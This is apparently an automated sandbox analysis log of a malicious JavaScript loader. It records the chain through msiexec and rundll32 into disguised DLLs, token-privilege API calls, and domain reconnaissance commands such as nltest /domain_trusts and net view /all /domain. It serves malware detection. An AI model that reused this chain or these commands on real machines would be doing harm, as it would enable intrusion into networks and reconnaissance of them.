Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950378C NtClose, 8_2_000001A37950378C
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A3795077B0 RtlInitUnicodeString,NtCreateFile, 8_2_000001A3795077B0
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950CB54 NtDelayExecution, 8_2_000001A37950CB54
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle, 8_2_000001A37950463C
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A37950B1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 8_2_000001A37950B1D4
Source: C:\Windows\System32\rundll32.exe Code function: 8_2_000001A3795079C8 NtClose, 8_2_000001A3795079C8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018006A2C8: DeviceIoControl, 6_2_000000018006A2C8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 6_2_000000018004B1A4
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIAA9D.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI39EE.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3A4C.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3A7C.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3AAC.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3AEC.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3B6A.tmp
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI39EE.tmp
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006F6A50 4_2_006F6A50
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0072F032 4_2_0072F032
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0071E270 4_2_0071E270
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0071C2CA 4_2_0071C2CA
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_007292A9 4_2_007292A9
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_007284BD 4_2_007284BD
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0071A587 4_2_0071A587
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006FC870 4_2_006FC870
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0072D8D5 4_2_0072D8D5
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_00714920 4_2_00714920
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_0071A915 4_2_0071A915
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_00720A48 4_2_00720A48
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006F9CC0 4_2_006F9CC0
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_00725D6D 4_2_00725D6D
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: String function: 0071325F appears 103 times
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: String function: 00713790 appears 39 times
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: String function: 00713292 appears 70 times
Source: Document_a19_79b555791-28h97348k5477-3219g9.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.spre.troj.evad.winJS@40/28@2/3
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 6_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 6_2_000000018008395A
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006F3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 4_2_006F3860
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006F4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 4_2_006F4BA0
Source: C:\Windows\Installer\MSI3B6A.tmp Code function: 4_2_006F45B0 LoadResource,LockResource,SizeofResource, 4_2_006F45B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 6_2_0000000180049AEC
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF428E4FF550ED71C3.TMP
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Installer\MSI3B6A.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Installer\MSI3B6A.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI3B6A.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI3B6A.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: windows.storage.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: wldp.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: kernel.appcore.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: uxtheme.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: propsys.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: apphelp.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: dlnashext.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: wpdshext.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: profapi.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: edputil.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: urlmon.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: iertutil.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: srvcli.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: netutils.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: sspicli.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: wintypes.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: appresolver.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: bcp47langs.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: slc.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: userenv.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: sppc.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Installer\MSI3B6A.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Echo("failed: " + e.message); }}installFromURL();}
